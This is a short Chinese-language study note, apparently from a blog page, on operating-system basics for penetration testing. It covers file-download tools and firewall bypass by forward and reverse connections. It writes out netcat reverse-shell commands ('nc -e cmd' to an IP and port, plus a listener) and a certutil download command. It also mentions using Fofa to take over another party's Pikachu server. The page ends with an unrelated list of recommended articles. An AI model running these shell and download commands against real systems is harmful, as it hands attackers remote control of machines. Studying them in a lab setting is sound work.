操作系统_名词_文件下载_反弹SHELL_防火墙绕过

操作系统

操作系统-用途&命令&权限&用户&防火墙

1、个人计算机&服务器用机

2、windows&Linux常见命令

3、文件权限&服务权限&用户权限

4、系统用户&用户组&服务用户等分类

5、自带防火墙出站&入站规则策略协议

实用案例1:文件上传下载-解决无图形化&解决数据传输

Linux:wget curl python ruby perl java等

Windows: Powershell Certutil Bitsadmin msiexec mshta rundll32等

实用案例2:反弹Shell命令-解决数据回显&解决数据通讯(反弹就是将权限给别人)

useradd passwd

测试Linux系统添加用户或修改命令交互回显

结合案例1:防火墙绕过-正向链接&反向链接&内网服务器

1、内网:

内网->用户

nc -e cmd ip地址 端口

就是把本机的cmd权限给这个ip的窗口

nc -lvvp 监听的端口号

2.防火墙

服务器主机<->另一个服务器主机

如果开了防火墙,是不行的

入站严格出站宽松

nc -e cmd ip地址 端口(就是正向链接)

主动把权限给出去

反向链接就是别人找你

结合案例-Fofa拿下同行Pikachu服务器

文件下载&反弹shell:

certuil -urlcache -split -f ip地址

nc -e cmd ip地址

找个在线的靶场

相关推荐
xiaotao13113 小时前
02-机器学习基础: 监督学习——线性回归
学习·机器学习·线性回归
墨黎芜14 小时前
ArcGIS从入门到精通——地图符号、注记的初步使用
学习·arcgis·信息可视化
小李云雾14 小时前
FastAPI重要知识点---中间件(Middleware)
学习·程序人生·中间件·fastapi·middleware
小夏子_riotous14 小时前
Docker学习路径——3、常用命令
linux·运维·服务器·学习·docker·容器·centos
STLearner15 小时前
WSDM 2026 | 时间序列(Time Series)论文总结【预测,表示学习,因果】
大数据·论文阅读·人工智能·深度学习·学习·机器学习·数据挖掘
redaijufeng15 小时前
网络爬虫学习:应用selenium获取Edge浏览器版本号,自动下载对应版本msedgedriver,确保Edge浏览器顺利打开。
爬虫·学习·selenium
腾科IT教育15 小时前
零基础快速上岸HCIP,高效学习思路分享
学习·华为认证·hcip·hcip考试·hcip认证
234710212715 小时前
4.14 学习笔记
笔记·python·学习
醇氧15 小时前
【学习】软件过程模型全解析:从瀑布到敏捷的演进之路
学习·log4j
邪修king16 小时前
UE5 零基础入门第三弹: 碰撞与触发交互,解锁场景机关与蓝图封装(高娱乐性学习)
学习·ue5·交互